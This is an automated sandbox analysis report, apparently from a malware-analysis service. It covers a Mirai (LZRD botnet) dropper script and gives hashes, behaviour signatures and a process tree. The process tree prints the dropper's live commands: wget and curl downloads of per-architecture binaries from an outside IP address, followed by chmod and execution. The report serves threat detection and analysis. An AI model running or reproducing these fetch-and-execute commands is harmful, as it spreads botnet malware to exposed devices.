Analysis

  • max time kernel
    13s
  • max time network
    15s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    23-12-2024 05:02

General

  • Target

    ohshit.sh

  • Size

    3KB

  • MD5

    e0ccd217979419469e913cbef10872f3

  • SHA1

    6bbef022dcf450af81bee90522e4c82069c84064

  • SHA256

    288bf21e07a5cc2a9f12c856ed829b9266878621c823542150ee74e961cc5d71

  • SHA512

    38402719e384396071ab1f779eb0d67a55570ecfb04018e47cafdfd73ce04984e15c0d2942b446cee5652a449e22a8690812dbe5fd232736cb8a3939531255ce

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification 1 TTPs 15 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 15 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks CPU configuration 1 TTPs 15 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 30 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 8 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Writes file to tmp directory
    PID:655
    • /usr/bin/wget
      wget http://154.213.187.234:3000/hiddenbin/boatnet.x86
      2⤵
        PID:657
      • /usr/bin/curl
        curl -O http://154.213.187.234:3000/hiddenbin/boatnet.x86
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        PID:666
      • /bin/cat
        cat boatnet.x86
        2⤵
          PID:675
        • /bin/chmod
          chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF
          2⤵
          • File and Directory Permissions Modification
          PID:678
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          PID:679
        • /usr/bin/wget
          wget http://154.213.187.234:3000/hiddenbin/boatnet.mips
          2⤵
          • System Network Configuration Discovery
          PID:681
        • /usr/bin/curl
          curl -O http://154.213.187.234:3000/hiddenbin/boatnet.mips
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          PID:686
        • /bin/cat
          cat boatnet.mips
          2⤵
          • System Network Configuration Discovery
          PID:691
        • /bin/chmod
          chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF
          2⤵
          • File and Directory Permissions Modification
          PID:692
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          PID:693
        • /usr/bin/wget
          wget http://154.213.187.234:3000/hiddenbin/boatnet.arc
          2⤵
            PID:695
          • /usr/bin/curl
            curl -O http://154.213.187.234:3000/hiddenbin/boatnet.arc
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            PID:697
          • /bin/cat
            cat boatnet.arc
            2⤵
              PID:698
            • /bin/chmod
              chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF
              2⤵
              • File and Directory Permissions Modification
              PID:699
            • /tmp/WTF
              ./WTF
              2⤵
              • Executes dropped EXE
              PID:700
            • /usr/bin/wget
              wget http://154.213.187.234:3000/hiddenbin/boatnet.i468
              2⤵
                PID:702
              • /usr/bin/curl
                curl -O http://154.213.187.234:3000/hiddenbin/boatnet.i468
                2⤵
                • Checks CPU configuration
                • Reads runtime system information
                PID:703
              • /bin/cat
                cat boatnet.i468
                2⤵
                  PID:704
                • /bin/chmod
                  chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF
                  2⤵
                  • File and Directory Permissions Modification
                  PID:705
                • /tmp/WTF
                  ./WTF
                  2⤵
                  • Executes dropped EXE
                  PID:706
                • /usr/bin/wget
                  wget http://154.213.187.234:3000/hiddenbin/boatnet.i686
                  2⤵
                    PID:708
                  • /usr/bin/curl
                    curl -O http://154.213.187.234:3000/hiddenbin/boatnet.i686
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    PID:709
                  • /bin/cat
                    cat boatnet.i686
                    2⤵
                      PID:713
                    • /bin/chmod
                      chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF
                      2⤵
                      • File and Directory Permissions Modification
                      PID:715
                    • /tmp/WTF
                      ./WTF
                      2⤵
                      • Executes dropped EXE
                      PID:716
                    • /usr/bin/wget
                      wget http://154.213.187.234:3000/hiddenbin/boatnet.x86_64
                      2⤵
                        PID:719
                      • /usr/bin/curl
                        curl -O http://154.213.187.234:3000/hiddenbin/boatnet.x86_64
                        2⤵
                        • Checks CPU configuration
                        • Reads runtime system information
                        PID:722
                      • /bin/cat
                        cat boatnet.x86_64
                        2⤵
                          PID:726
                        • /bin/chmod
                          chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF
                          2⤵
                          • File and Directory Permissions Modification
                          PID:728
                        • /tmp/WTF
                          ./WTF
                          2⤵
                          • Executes dropped EXE
                          PID:729
                        • /usr/bin/wget
                          wget http://154.213.187.234:3000/hiddenbin/boatnet.mpsl
                          2⤵
                            PID:732
                          • /usr/bin/curl
                            curl -O http://154.213.187.234:3000/hiddenbin/boatnet.mpsl
                            2⤵
                            • Checks CPU configuration
                            • Reads runtime system information
                            PID:735
                          • /bin/cat
                            cat boatnet.mpsl
                            2⤵
                              PID:739
                            • /bin/chmod
                              chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF
                              2⤵
                              • File and Directory Permissions Modification
                              PID:740
                            • /tmp/WTF
                              ./WTF
                              2⤵
                              • Executes dropped EXE
                              PID:742
                            • /usr/bin/wget
                              wget http://154.213.187.234:3000/hiddenbin/boatnet.arm
                              2⤵
                                PID:744
                              • /usr/bin/curl
                                curl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm
                                2⤵
                                • Checks CPU configuration
                                • Reads runtime system information
                                PID:747
                              • /bin/cat
                                cat boatnet.arm
                                2⤵
                                  PID:751
                                • /bin/chmod
                                  chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:752
                                • /tmp/WTF
                                  ./WTF
                                  2⤵
                                  • Executes dropped EXE
                                  PID:754
                                • /usr/bin/wget
                                  wget http://154.213.187.234:3000/hiddenbin/boatnet.arm5
                                  2⤵
                                    PID:756
                                  • /usr/bin/curl
                                    curl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm5
                                    2⤵
                                    • Checks CPU configuration
                                    • Reads runtime system information
                                    PID:759
                                  • /bin/cat
                                    cat boatnet.arm5
                                    2⤵
                                      PID:763
                                    • /bin/chmod
                                      chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF
                                      2⤵
                                      • File and Directory Permissions Modification
                                      PID:764
                                    • /tmp/WTF
                                      ./WTF
                                      2⤵
                                      • Executes dropped EXE
                                      PID:767
                                    • /usr/bin/wget
                                      wget http://154.213.187.234:3000/hiddenbin/boatnet.arm6
                                      2⤵
                                        PID:770
                                      • /usr/bin/curl
                                        curl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm6
                                        2⤵
                                        • Checks CPU configuration
                                        • Reads runtime system information
                                        PID:773
                                      • /bin/cat
                                        cat boatnet.arm6
                                        2⤵
                                          PID:780
                                        • /bin/chmod
                                          chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF
                                          2⤵
                                          • File and Directory Permissions Modification
                                          PID:781
                                        • /tmp/WTF
                                          ./WTF
                                          2⤵
                                          • Executes dropped EXE
                                          PID:783
                                        • /usr/bin/wget
                                          wget http://154.213.187.234:3000/hiddenbin/boatnet.arm7
                                          2⤵
                                            PID:786
                                          • /usr/bin/curl
                                            curl -O http://154.213.187.234:3000/hiddenbin/boatnet.arm7
                                            2⤵
                                            • Checks CPU configuration
                                            • Reads runtime system information
                                            PID:791
                                          • /bin/cat
                                            cat boatnet.arm7
                                            2⤵
                                              PID:795
                                            • /bin/chmod
                                              chmod +x ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:797
                                            • /tmp/WTF
                                              ./WTF
                                              2⤵
                                              • Executes dropped EXE
                                              PID:799
                                            • /usr/bin/wget
                                              wget http://154.213.187.234:3000/hiddenbin/boatnet.ppc
                                              2⤵
                                                PID:801
                                              • /usr/bin/curl
                                                curl -O http://154.213.187.234:3000/hiddenbin/boatnet.ppc
                                                2⤵
                                                • Checks CPU configuration
                                                • Reads runtime system information
                                                • Writes file to tmp directory
                                                PID:805
                                              • /bin/cat
                                                cat boatnet.ppc
                                                2⤵
                                                  PID:827
                                                • /bin/chmod
                                                  chmod +x boatnet.ppc ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF
                                                  2⤵
                                                  • File and Directory Permissions Modification
                                                  PID:828
                                                • /tmp/WTF
                                                  ./WTF
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:829
                                                • /usr/bin/wget
                                                  wget http://154.213.187.234:3000/hiddenbin/boatnet.spc
                                                  2⤵
                                                  • Writes file to tmp directory
                                                  PID:831
                                                • /usr/bin/curl
                                                  curl -O http://154.213.187.234:3000/hiddenbin/boatnet.spc
                                                  2⤵
                                                  • Checks CPU configuration
                                                  • Reads runtime system information
                                                  • Writes file to tmp directory
                                                  PID:832
                                                • /bin/cat
                                                  cat boatnet.spc
                                                  2⤵
                                                    PID:833
                                                  • /bin/chmod
                                                    chmod +x boatnet.ppc boatnet.spc ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF
                                                    2⤵
                                                    • File and Directory Permissions Modification
                                                    PID:834
                                                  • /tmp/WTF
                                                    ./WTF
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:835
                                                  • /usr/bin/wget
                                                    wget http://154.213.187.234:3000/hiddenbin/boatnet.m68k
                                                    2⤵
                                                    • Writes file to tmp directory
                                                    PID:837
                                                  • /usr/bin/curl
                                                    curl -O http://154.213.187.234:3000/hiddenbin/boatnet.m68k
                                                    2⤵
                                                    • Checks CPU configuration
                                                    • Reads runtime system information
                                                    • Writes file to tmp directory
                                                    PID:838
                                                  • /bin/cat
                                                    cat boatnet.m68k
                                                    2⤵
                                                      PID:839
                                                    • /bin/chmod
                                                      chmod +x boatnet.m68k boatnet.ppc boatnet.spc ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF
                                                      2⤵
                                                      • File and Directory Permissions Modification
                                                      PID:840
                                                    • /tmp/WTF
                                                      ./WTF
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:841
                                                    • /usr/bin/wget
                                                      wget http://154.213.187.234:3000/hiddenbin/boatnet.sh4
                                                      2⤵
                                                      • Writes file to tmp directory
                                                      PID:843
                                                    • /usr/bin/curl
                                                      curl -O http://154.213.187.234:3000/hiddenbin/boatnet.sh4
                                                      2⤵
                                                      • Checks CPU configuration
                                                      • Reads runtime system information
                                                      • Writes file to tmp directory
                                                      PID:844
                                                    • /bin/cat
                                                      cat boatnet.sh4
                                                      2⤵
                                                        PID:845
                                                      • /bin/chmod
                                                        chmod +x boatnet.m68k boatnet.ppc boatnet.sh4 boatnet.spc ohshit.sh systemd-private-3b148e8f820244b985fb9e6bdebf8e5b-systemd-timedated.service-dGep55 WTF
                                                        2⤵
                                                        • File and Directory Permissions Modification
                                                        PID:846
                                                      • /tmp/WTF
                                                        ./WTF
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:847

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • /tmp/WTF

                                                      Filesize

                                                      21KB

                                                      MD5

                                                      1e162c39d85d8f08728210db19798879

                                                      SHA1

                                                      8d2ee60a26c1c38de42037feeefdc628118d70b5

                                                      SHA256

                                                      d6952ca2b659cb009ca7d0de6246b8ae8e0a86423522b7f1316bfdfd91e06c70

                                                      SHA512

                                                      85b3ae42f8523f1928e76c9cf64b673914e149750104d814def5e59f9c076d96840b523b9d573b9335bd28f9b4b900c6e1298dbd68382154601eba13463bd13d

                                                    • /tmp/WTF

                                                      Filesize

                                                      57KB

                                                      MD5

                                                      76f2df5e034fbe227f5cd851376d3d1f

                                                      SHA1

                                                      d3cfcb394d6669d6b7e5956b9f9cd4de149a3cef

                                                      SHA256

                                                      0c011c0cc1645385ba4e67bedd8ea7348b7a9c632d974e0ba0bf9943bb1fa61f

                                                      SHA512

                                                      f81e8c3ac094d35329aa3089ed4eac6f2418ff7da92403ca10d0f2b67e665c183db9b8544ead4894f9bb5581721ce4df03e112ef1c6606bfec2e0fd3a7562bf8

                                                    • /tmp/WTF

                                                      Filesize

                                                      53KB

                                                      MD5

                                                      aa19cffc3b569300ba677ffc4cb70ab9

                                                      SHA1

                                                      36039da7c231eb0a6eb299ed88e4f058e8bb5165

                                                      SHA256

                                                      53044334e5ee28766499aade3d9ea8bf57c82f739ddb3331afa3e2299364e77d

                                                      SHA512

                                                      0504b00ccb95463cb75140c0d33067392f659c54d69ff0e18c3bcb5841d9090dc315165649469334ebbb74ab27922395d410fd5b1bb890ecbefb93ad4a1b18b0

                                                    • /tmp/WTF

                                                      Filesize

                                                      48KB

                                                      MD5

                                                      9910604ba5bdd7b651f13f828e78c318

                                                      SHA1

                                                      54e183f34ca44f8eb521b657cfcf4855cdf5eac1

                                                      SHA256

                                                      93cd701ed36fc3247e226d183e474e1760004df0261109e8ad74d87a181781a1

                                                      SHA512

                                                      428793ecf340f54ca87573fd8260c82f03539952e003c1ae96b858e3eaa6a7362b2e74a7f03baa042d199641097566a0cb2aca4a3bdd4d4e6e4a28eec97e1009